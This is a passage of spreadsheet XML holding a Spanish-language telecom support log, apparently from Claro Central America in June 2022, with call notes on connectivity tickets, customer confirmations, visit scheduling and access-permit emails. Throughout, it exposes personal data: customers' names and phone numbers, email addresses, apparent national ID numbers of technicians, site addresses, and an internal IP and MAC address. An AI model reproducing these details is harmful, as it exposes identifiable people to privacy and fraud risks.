NOMBRE: A: 41380208
NÚMERO: 41380208
DURACIÓN: 0:09:41
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 41380208
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 6/06/2022 09:18:45</t>
  </si>
  <si>
    <t>SE LLAMA AL GN 79622222 LLAMADA COMPLETA, LCIENTE IRIS MARTINEZ-41380208  INDICA QUE REALIZARA PRUEBAS ##VIVO</t>
  </si>
  <si>
    <t>F4591373</t>
  </si>
  <si>
    <t>SE HABLO CON CLIENTE DAVID PAREDES E INDICA QUE SERVICIO YA ESTÁ FUNCIONANDO BIEN SE PROCEDE AL CIERRE.</t>
  </si>
  <si>
    <t>F4591374</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LUZVIN MORA 42200342 - 56954386 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001513392 - 1001513776</t>
  </si>
  <si>
    <t>F4591377</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MARIA JOSE 89813066 PARA BRINDAR RETROALIMENTACION
-ID 1001515641</t>
  </si>
  <si>
    <t>F4591388</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE WALTER REYES 45787911 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001517259</t>
  </si>
  <si>
    <t>F4591389</t>
  </si>
  <si>
    <t>CLIENTE MIGUEL CARDONA 30038166, CLIENTE UBICA OP108 ALARMADO, PROCEDE A REINICIARLO PERO INCONVENIENTE PERSISTE.
ESTADO OP108
PWR VERDE
CH1, CH3, CH4  ROJO</t>
  </si>
  <si>
    <t>F4591395</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DALILA  58816268 MENCIONA QUE EL INCONVENIENTE ES CON ALGUNAS PC NO ES CON TODAS
SE LE INDICA QUE A NIVEL DE CLARO ESTA OPERATIVO Y ESTABLE,
CLIENTE INDICA QUE DARA EGUIMIENTO CON SU IT
-ID 1001504707</t>
  </si>
  <si>
    <t>F4591396</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. SALVADOR MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001499526</t>
  </si>
  <si>
    <t>F4591403</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FRANCICO FLORES 79196262 SE DEJA EN CONFERENCIA CON GESTOR
-ID 1001519486</t>
  </si>
  <si>
    <t>F4591406</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JOSE CAMPOSECO 30259662 ENVIA DIRECTAMENTE A BUZON, SE INTENTARA LUEGO
-ID 1001523442</t>
  </si>
  <si>
    <t>SE LLAMA A CENTRAL BRYAN ALVIZURES 42617499   NO RESPONDE, SE INTENTARA LUEGO
-ID 1001523715</t>
  </si>
  <si>
    <t>F4591411</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MARVIN LOPEZ AL 52145131  CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 1001495495
**</t>
  </si>
  <si>
    <t>F4591412</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE OSCAR BALDERRAMOS 33809193 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001614366</t>
  </si>
  <si>
    <t>F4591424</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE NOELIA CHAMORRO 78675456 MENCIONA QUE YA APLICARON REINICIO PERO EL INCONVENIENTE PERSISTE
-ID 1001525811
NOMBRE DEL CLIENTE: MINISTERIO DE EDUCACION
UBICACIÓN: KILOMETRO 23 CARRETERA SUR DEL PARQUE 1 KILOMETRO CARRETERA HACIA LAS NUBES CONTIGUO A LOS PANQUES DE ENACAL
CONTACTO EN SITIO: NOELIA CHAMORRO 78675456
HORARIO DE ATENCION: 7:00 - 17:00
GESTIÓN DE PERMISOS: UNICAMENTE IDENTIFICADOS</t>
  </si>
  <si>
    <t>F4591425</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE OMAR ROMERO 78536075 MENCIONA QUE NO SE ENCUENTRA EN PR POR LO QUE SOLICITA LLAMADA PARA LAS 13:30 VALIDAR EL FUNCIONAMIENTO
-ID 1001563184</t>
  </si>
  <si>
    <t>F4591427</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE KAREN MORALES-54943450---SE TIENE EN LINEA ##
1001517333
COLA:
NOMBRE: A: 54943450
NÚMERO: 54943450
DURACIÓN: 0:01:03
ESTADO: CONECTADA
DETALLES: 54943450
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 6/06/2022 10:34:51</t>
  </si>
  <si>
    <t>CLIENTE COMETNA QUE NO PUEDE TOCAR EEQUIPOS, PIDE SE LE MARQUE EN 15 MINUTOS ## LLAMARA A SU TEC
KAREN MORALES-54943450</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE KAREN MORALES-54943450 --- SET IENEE EN LINEA ##
1001499672
COLA:
NOMBRE: A: 54943450
NÚMERO: 54943450
DURACIÓN: 0:00:20
ESTADO: CONECTADA
DETALLES: 54943450
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 6/06/2022 09:44:38</t>
  </si>
  <si>
    <t>F4591431</t>
  </si>
  <si>
    <t>SE HABLO CON CLIENTE SILVIA LEIVA E INDICA QUE CTC TIENE SOLO LUZ DE POWER ENCENDIDA SE SOLICITARA LA VISITA TECNICA.</t>
  </si>
  <si>
    <t>F4591436</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MARCOS GARCIA AL 30882313 NO RESPONDE || SE INTENTARA LUEGO **
ID 1001514537
**</t>
  </si>
  <si>
    <t xml:space="preserve">
SE CONVERSA CON CLIENTE EMILIO ALVARADO, COMENTA QUE NO ESTA EN SITIO PARA VALIDAR SERVICIO, SOLICITA SE LLAME A MARCOS GARCIA 30882313 PARA VALIDAR
1001505626
COLA:
NOMBRE: A: 55512694
NÚMERO: 011 50255512694
DURACIÓN: 0:01:38
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: +50255512694
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 6/06/2022 10:03:10</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FREDY MUÑOZ 53061776 MENCIONA QUE NO ES EL ENCARGADO DE ESTA FISCALIA PERO BRINDA CONTACTO YANCARLO TOBAN 59951683
-ID 1001533574</t>
  </si>
  <si>
    <t>SE LLAMA A LA CENTRAL 24119191 EXT 10582 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 1001536311</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE YANCARLO TOBAN 59951683 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001535407</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MARCOS GARCIA 30882313 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001532802</t>
  </si>
  <si>
    <t>F4591443</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SELIM VELARDE AL 85290825 POR EL MOMENTO SERVICIO ESTABLE PERO SOLICITA QUE SE DEJE EN OBSERVACION PARA LAS 18:00 HRS **
ID 1001515530
**</t>
  </si>
  <si>
    <t>F4591445</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  GERADO GONZALES 41385114 MENCIONA QUE NO HAY ENERGIA EN PR
-ID 1001530621</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE GERADO GONZALES AL 41385114 SOLICITA QUE SE LE LLAME EN 20 MIN NUEVAMENTE**
ID 1001518582
**</t>
  </si>
  <si>
    <t>F4591447</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE VEYMER GUITIERREZ AL 57365383 NO RESPONDE ENVIA A BUZON ||
SE INTENTARA LUEGO**
ID 1001794039
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  VEYMER GUITIERREZ 57365383 NO RESPONDE || SE INTENTARA LUEGO **
ID 1001519822
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  VEYMER GUITIERREZ 57365383 MENCIONA QUE PERSISTE LOS INCONVENIENTES, CLIENTE COLOCA EN LA LLLAMADA A PR Y SE DEJA EN CONFERENCIA CON GESTOR
-ID 1001600178</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE VEYMER GUITIERREZ AL 57365383  NO RESPONDE ENVIA A BUZON |
 SE INTENTARA LUEGO **
ID 1001538247
**</t>
  </si>
  <si>
    <t>F4591449</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ERNERTOS VALLEJOS AL 0050585884391 INDICA QUE SIGUE  MUY INESTABLE QUE NO LE CARGA NO LE DEJA ENVIAR CORREOS || SE NOTIFICA A GESTOR **
ID 1001544622 -
**</t>
  </si>
  <si>
    <t>F4591451</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JONTHAN ROCA AL 77201665 NO RESPONDE || SE INTENTARA LUEGO**
ID 1001521902
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JONTHAN ROCA AL 77201665 INDICA QUE ESTA DEMASIADO LENTO PERO QUE AHORITA SALIO A ALMORZAR SOLICITA QUE SE LE LLAME EN 1 HR **
ID 1001548078
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JONTHAN ROCA 77201665 NO RESPONDE, SE INETNTARA LUEGO
-ID 1001599347</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JONTHAN ROCA 77201665 MENCIONA QUE EL INCONVENIENTE ES INTERMITENCIA, SE DEJA EN CONFERENCIA
-ID 1001606476</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JONTHAN ROCA  AL 77201665  INDICA QUE POR EL MOMENTO ESTA ESTABLE PERO EL PROBLEMA ES QUE SIEMPRE LE DA LA INESTABILIDAD CADA QUE EMPIEZA A LLOVER YA SEA POR LA MAÑANA O TARDE || SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE **
ID 1001572148
**</t>
  </si>
  <si>
    <t>F4591452</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE RICARDO FUENTES 58599946 MENCIONA QUE PRESENTARON PROBLEMA DE ENERGIA
-ID 1001504051</t>
  </si>
  <si>
    <t>F4591453</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE RODRIGO GUZMAN AL 55940473 NO RESPONDE || SE INTENTARA LUEGO **
ID 1001524474
**</t>
  </si>
  <si>
    <t>F4591455</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE RICARDO FUENTES 58599946 MENCIONA QUE NO CUENTAN CON ENERGIA EN PR
-ID 1001531529</t>
  </si>
  <si>
    <t>F4591464</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ING. CARLOS FIGUEROA-71735277 SE TIENE EN LINEA ##
1001571299
COLA:
NOMBRE: A: 0050371735277
NÚMERO: 0050371735277
DURACIÓN: 0:01:15
ESTADO: CONECTADA
DETALLES: 0050371735277
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 6/06/2022 13:10:03</t>
  </si>
  <si>
    <t>ING. CARLOS FIGUEROA-71735277 APLICA RESET A EQUIPO Y EQUIPO SE MANTIENE ALARMADO##
RESULTADO: LLAMADA HECHA
NOMBRE: 0050371735277
NÚMERO: 0050371735277
INICIO: HOY, 13:08
FIN: HOY, 13:17
DURACIÓN: 8:41
ID DE LLAMADA: 1001571299</t>
  </si>
  <si>
    <t>F4591465</t>
  </si>
  <si>
    <t>SE HABLA CON RENE CERON (CLIENTE) SE LE INFORMA LO INDICADO EN CRONOS ANTERIORES, REALIZA PRUEBAS, CONFIRMA TODO OK Y AUTORIZA CIERRE DE TICKET -*
-*</t>
  </si>
  <si>
    <t>F4591466</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ANGEL ALVARADO AL 78559111 CLIENTE HA SOLICITADO VISITA PARA EL 9 DE JUNIO A LAS 9:00 AM YA QUE EL INCONVENIENTE PERSISTE CL CUENTA CON 2 OPERADORES Y ACTUALMENTE NO ESTA OPERANDO CON EL DE CLARO PERO SE NECESITAN REALIZAR PRUEBAS EN CONJUNTO CON CLIENTE ESE DIA NO SE NECESITA TRAMITAR ACCESOS SOLO IDENTIFICADOS || SE NOTIFICA A GESTOR **
ID 1001540280
**</t>
  </si>
  <si>
    <t>F4591477</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 22437253 GERALD MENCIONA QUE ESTARA GESTIONANDO LOS PERMISOS CON PR EN ESTE MOMENTO
-ID 1001550931</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE PARA LA GESTION DE PERMISOS
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: LUNES, 6 DE JUNIO DE 2022 11:39
PARA: LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; JOSE MARTINEZ (VENDOR- PBS) &lt;JOSE.MARTINEZ6@WALMART.COM&gt;; GERALD TORRES (VENDOR) &lt;GERALD.TORRES@WALMART.COM&gt;; CORPOWALMART &lt;CORPOWALMART@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA &lt;CAM-CCINFR@WAL-MART.COM&gt;; HUMBERTO RAMOS &lt;HUMBERTO.RAMOS@WALMART.COM&gt;
ASUNTO: RE: ENLACE INTERNET PLANTA HF MANAGUA
BUEN DÍA
SOLICITAMOS PUEDA GESTIONARSE EL ACCESO A PERSONAL TÉCNICO DE CLARO PARA EL INGRESO A SUS INSTALACIONES PARA REALIZAR LAS REPARACIONES NECESARIAS.
MILTON CALEB VANEGAS GARAY   001-250781-0057P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91485</t>
  </si>
  <si>
    <t>SE FINALIZA CONFERENCIA.
RESUMEN: OSCAR GONZALEZ DE TELETECHNO REALIZA TRAZAS Y VALIDA QUE EL INCONVENIENTE PROVIENE DE PARTE DE LA PBX, VALIDA QUE LAS REGLAS ESTÁN CONFIGURADAS CORRECTAMENTE, SE REALIZA PRUEBAS CON OTROS DID Y SÍ SE RESPETAN LA REGLAS.  SE REALIZAN TRAZAS Y SE OBSERVA QUE AL MOMENTO DE SACAR LLAMADAS  DESDE EL DID 	22123060 LA PBX INTENTA SALIR CON OTRO NÚMERO QUE NO ES EL DID. POR LO QUE CLIENTE DEBE VERIFICAR DE MANERA INTERNA LA CONFIGURACIÓN DE SU PLANTA PBX. CLIENTE JAVIER SOLEITO  Y AMILCAR RIVERA QUEDAN ENTERADOS.
1001742839
COLA:
NOMBRE: A: SAQITZUNUN ULIL COJTI LOPEZ
NÚMERO: 4199
DURACIÓN: 1:10:32
ESTADO: DESCONECTADO [ÚLTIMO PARTICIPANTE DE CONFERENCIA]
DETALLES: 4199
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: SAQITZUNUN.COJTI
FECHA Y HORA LOCALES: 07/06/2022 12:01:36 P. M.</t>
  </si>
  <si>
    <t>INFORMA CLIENTE AMILCAR RIVERA 56956068 QUE AL REALIZAR LLAMADAS DESDE EL DID 22123060 EN EL IDENTIFICADOR APARECE EL NÚMERO 22123000 Y ELLOS NECESITAN QUE SE CONFIGURE PARA QUE APAREZCA EL DID MENCIONADO. ID: 1001521879</t>
  </si>
  <si>
    <t>CLIENTE JAVIER SOLEITO 48070651 INDICA QUE ESTARÁ DANDO SEGUIMIENTO DE MANERA INTERNA PARA VERIFICAR SU PLANTA PBX. AUTORIZA EL CIERRE DEL CASO.
1001785253
COLA:
NOMBRE: A: 48070651
NÚMERO: 48070651
DURACIÓN: 0:01:07
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 48070651
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: SAQITZUNUN.COJTI
FECHA Y HORA LOCALES: 07/06/2022 12:53:14 P. M.</t>
  </si>
  <si>
    <t>A SOLICITUD DE CLIENTE JAVIER SOLEITO 48070651 DEL BI, SOLICITA QUE SE REALICE LA CONFERENCIA A LAS 10:45 AM YA QUE SE ENCUENTRA OCUPADO. OSCAR GONZALEZ DE TELETECHNO ENTERADO DEL HORARIO.
1001726831
COLA:
NOMBRE: A: 48070651
NÚMERO: 48070651
DURACIÓN: 0:00:39
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 48070651
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 7/06/2022 10:10:49
1001726388
COLA:
NOMBRE: A: 58386684
NÚMERO: 58386684
DURACIÓN: 0:03:14
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 58386684
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 7/06/2022 10:11:06</t>
  </si>
  <si>
    <t>F4591494</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MARI AREVALO 37914865  MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001514890 - 1001514857</t>
  </si>
  <si>
    <t>F4591507</t>
  </si>
  <si>
    <t>WALTER-22320908 --- CONTESTA SEÑORITA RECPECTIONAISTA Y NOS COMENTA QUE TENEMOS QUE AVOCARNOS A ILEANA PERO AHORITA NO ESTA + PIDE SE LE MARQUE EN 25 MINUTOS
1001546958
COLA:
NOMBRE: A: 0050322320908
NÚMERO: 0050322320908
DURACIÓN: 0:01:58
ESTADO: CONECTADA
DETALLES: 0050322320908
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 6/06/2022 11:55:45</t>
  </si>
  <si>
    <t>SE LLAMAA  CLIENTE--WALTER-22320908  CONTESTA A  ## DANIELA VENTURA --- COEMNTA QUE YA TODO OK Y QUE SE PROCEDA AL CIERRE ##VIVO</t>
  </si>
  <si>
    <t>F4591510</t>
  </si>
  <si>
    <t>SE CONTACTARÁ AL CLIENTE A LAS 14:30 HORAS COMO LO SOLICITO CAM</t>
  </si>
  <si>
    <t>F4591516</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MILTON LOPEZ AL 35153471 INDICA QUE REALIZARAN PRUEBAS Y SOLICITA QUE SE LE LLAME A MEDIO DIA **
ID 1001689897
**</t>
  </si>
  <si>
    <t>CLIENTE MILTON LOPEZ  INDICA QUE EL SERVICIO YA ESTÁ RESTABLECIDO, PERO SE COORDINARÁ VISITA PARA CERTIFICAR LA UM YA QUE SE OBSERVA INCREMENTO DE ERRORES SINCRONÍA Y DBIT ID DE LLAMADA: 1001527413</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE MILTON LOPEZ 35153471 INDICA QUE EL SERVICIO SIGUE PRESENTANDO INTERMITENCIA, SOLICITA VISITA EL DIA DE MAÑANA A LAS 8:00 AM
1001828634
COLA:
NOMBRE: A: 35153471
NÚMERO: 35153471
ESTADO: CONECTADA
DURACIÓN: 0:01:31
DETALLES: 35153471
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSEGODINEZ
FECHA Y HORA LOCALES: 7/06/2022 15:16:16</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MILTON LOPEZ 35153471 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 2001213353</t>
  </si>
  <si>
    <t>F4591522</t>
  </si>
  <si>
    <t>CLIENTE MILTON LOPEZ 35153471 NO CONTESTA, SE DARÁ SEGUIMIENTO EL DÍA DE MAÑANA EN HORARIO HÁBIL PORQUE EL REPORTE ES INTERMITENCIA Y SE NECESITA CONFIRMAR EL FUNCIONAMIENTO</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE MILTON LOPEZ 35153471 PERO NO CONTESTA, SE INTENTARA EN UNOS INSTANTES
1001650144
1001650144
1001650434</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MILTON LOPEZ 35153471 QUIEN SOLICITA LLAMADA PARA EL MEDIO DIA VALIDAR EL FUNCIONAMIENTO
-ID 1001701947</t>
  </si>
  <si>
    <t>F4591524</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. FREDY PONCE 58263321  INFORMA QUE ESTA EN SITIO, HORARIO DE ATENCION DE 8AM A 5 PM</t>
  </si>
  <si>
    <t>F4591527</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ERVYS FRANKLIN / 77630078 MENCIONA QUE EL SERVICIO YA ESTA FUNCIONANDO DE MANERA CORRECTA
-ID 1001528066</t>
  </si>
  <si>
    <t>F4591537</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE AL PARECER NO ESCUCHA Y CORTA LLAMADA-</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE YENIFER REYES AL 26581792 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 1001564592
**</t>
  </si>
  <si>
    <t>F4591539</t>
  </si>
  <si>
    <t>SE DETERMINA QUE CLIENTE TIENTE EQUIPO CON IP 10.45.164.42   Y MAC   84B5.9C5C.1700, EN EL CPE NO HAY REGISTROS DE CAIDAS EN INTERFACES O REINICIOS RECIENTES, CLIENTE CONFIRMA SERVICIO OPERATIVO Y AUTORIZA CIERRE DE CASO.
NÚMERO: 0050360526528
FIN: HOY, 10:59
ID DE LLAMADA: 1001523805</t>
  </si>
  <si>
    <t>F4591546</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JUAN RAMIREZ-24520542 VALIDA QUE YA POSEE SERVICIO TELEFONICO ##
RESULTADO: LLAMADA HECHA
NOMBRE: 0050324520542
NÚMERO: 0050324520542
INICIO: HOY, 10:48
FIN: HOY, 10:50
DURACIÓN: 2:02
ID DE LLAMADA: 1001741696</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JUAN RAMIREZ-24520542 ## ENVIA DIRECTO A BUZON ##SE INTENTARA LUEGO
1001565273
COLA:
NOMBRE: A: 0050324520542
NÚMERO: 0050324520542
DURACIÓN: 0:00:26
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050324520542
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 6/06/2022 12:50:17</t>
  </si>
  <si>
    <t>SE HABLO CON EL CLIENTE JUAN RAMIREZ, QUIEN APOYA A REVISAR EL ASMI E INDICA QUE NO ESTA ALARMADO.
PWR EN VERDE, SYNC A EN VERDE. CLIENTE INDICA QUE EL EQUIPO ESTA EN ALTO POR LO QUE NO PUEDE REINCIARLO.
INDICA QUE EL DIA DE HOY SE RETIRA A LAS 16:00HRS POR LO QUE SOLICITA UNA VISITA PARA EL DIA DE MAÑANA A LAS 8:00AM
1001587166
COLA:
NOMBRE: A: 0050377453338
NÚMERO: 0050377453338
DURACIÓN: 0:00:38
ESTADO: CONECTADA
DETALLES: 0050377453338
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 6/06/2022 13:59:57</t>
  </si>
  <si>
    <t>F4591549</t>
  </si>
  <si>
    <t>SE TIENE CORREO DE CLIENTE AUTORIZANDO LOS PERMISOS
DE: GERENTE SUCURSAL RAXRUHA (RAMIRO MILIAN) &lt;JEFERAXRUHA@GENESISEMPRESARIAL.COM&gt;
ENVIADO: MIÉRCOLES, 8 DE JUNIO DE 2022 8:30
PARA: JOSE ARTURO CORADO JIMENEZ &lt;JOSE.CORADO@CLARO.COM.GT&gt;; JUAN CARLOS LOPEZ SANCHEZ &lt;JUAN.LOPEZS@CLARO.COM.GT&gt;; GCRAXRUHA@GENESISEMPRESARIAL.COM &lt;GCRAXRUHA@GENESISEMPRESARIAL.COM&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: RE: SIN SERVICIO || 245700152T || FUNDACION GENESIS EMPRESARIAL || CALLE PRINCIPAL, ENTRADA A CENTRO DE SALUD, BARRIO CONCEPCION,
BUEN DÍA JOSE,
EN COORDINACIÓN CON EL ÁREA DE TECNOLOGIA, SE AUTORIZA EL PERMISO RESPECTIVO.
SALUDOS CORDIALES.
ATENTAMENTE,
*-*-*-*</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE YESENIA  31866276 MENCIONA QUE EL GERENTE ESTARA RESPONDIENDO CON LOS PERMISOS AUTORIZADOS
-ID 1001908577</t>
  </si>
  <si>
    <t>F4591552</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DANICA DE LEON  50186215  - 55153914 NO RESPONDE, ENVIA A BUZON, SE INTENTARA LUEGO
-ID 1001635883</t>
  </si>
  <si>
    <t>F4591555</t>
  </si>
  <si>
    <t>SE LLAMA A HUGO VALENZUELA QUE ME DA CONTACTOS CON LA CENTRAL PARA QUE ME COMUNIQUE.
23839000 INFRASTUCTURA CON ISRAEL VASQUEZ
2001073129
COLA:
NOMBRE: A: 56917030
NÚMERO: 56917030
DURACIÓN: 0:01:17
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 56917030
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: CARLOSI.PALENCIA
FECHA Y HORA LOCALES: 8/06/2022 16:16:58</t>
  </si>
  <si>
    <t>SE TERMINA LA LLAMADA CON EL GERENTE, SE SOLICITA EL APOYO PARA VALIDAR LOS EQUIPOS SIN EMBARGO ME DICE QUE LOS EQUIPOS ESTAN BIEN ESAMBLADOS Y QUE NO QUISIERA TOCAR, POR LO QUE SE PROCEDERA A ENVIAR PERSONAL TECNICO.
RESULTADO: LLAMADA HECHA
NOMBRE: 30448419
NÚMERO: 011 50230448419
INICIO: HOY, 16:31
FIN: HOY, 16:36
DURACIÓN: 5:01
ID DE LLAMADA: 2001078229</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE SOLICITANDO ACCESOS
DE: CARLOS EDGARDO ICHEL ESCOBAR
ENVIADO: MIÉRCOLES, 8 DE JUNIO DE 2022 18:32
PARA: HELPDESK@GENESISEMPRESARIAL.COM &lt;HELPDESK@GENESISEMPRESARIAL.COM&gt;; GPU@GENESISEMPRESARIAL.COM &lt;GPU@GENESISEMPRESARIAL.COM&gt;; WRODRIGUEZ@GENESISEMPRESARIAL.COM &lt;WRODRIGUEZ@GENESISEMPRESARIAL.COM&gt;; CESPINOZA@GENESISEMPRESARIAL.COM &lt;CESPINOZA@GENESISEMPRESARIAL.COM&gt;; MTINTI@GENESISEMPRESARIAL.COM &lt;MTINTI@GENESISEMPRESARIAL.COM&gt;; SOPORTE@GENESISEMPRESARIAL.COM &lt;SOPORTE@GENESISEMPRESARIAL.COM&gt;; DSINCAL@GENESISEMPRESARIAL.COM &lt;DSINCAL@GENESISEMPRESARIAL.COM&gt;; MTINTI@GENESISEMPRESARIAL.COM &lt;MTINTI@GENESISEMPRESARIAL.COM&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: F4591555 || 245700144T || CC_FUNDGENESIS_GT_TEJUTLA_056
BUENAS NOCHES APRECIABLE CLIENTE,
SOLICITAMOS DE SU APOYO COORDINANDO ACCESOS, POR FAVOR BRINDARNOS FECHA Y HORA DE VISITA TECNICA, ACTUALMENTE SE OBSERVA DOWN EL ENLACE REDUNDANTE.
ID 245700144T
REDUNDANCIA.- 2 AVENIDA ENTRE 5 Y 6 CALLE ZONA 2 VIA TEJUTLA SAN MARCOS
PERSONAL TECNICO:
582924 GUSTAVO CEFERINO GARCÍA LÓPEZ 1903727451201</t>
  </si>
  <si>
    <t>SE HABAL CON EL GERENTE Y ME DICE QUE SE LLAME A SU NUMERO: 30448419
2001074238
COLA:
NOMBRE: A: 23839000
NÚMERO: 23839000
DURACIÓN: 0:12:05
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 23839000
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: CARLOSI.PALENCIA
FECHA Y HORA LOCALES: 8/06/2022 16:30:24</t>
  </si>
  <si>
    <t>F4591561</t>
  </si>
  <si>
    <t xml:space="preserve">
DE: ALEJANDRO NAVARRO FERNANDEZ
ENVIADO: LUNES, 6 DE JUNIO DE 2022 16:23
PARA: EDYJURACAN@GMAIL.COM &lt;EDYJURACAN@GMAIL.COM&gt;
ASUNTO: CENTER TECNOLOGIA Y SOLUCIONES | 936500001T
BUENAS TARDES ING. EDY
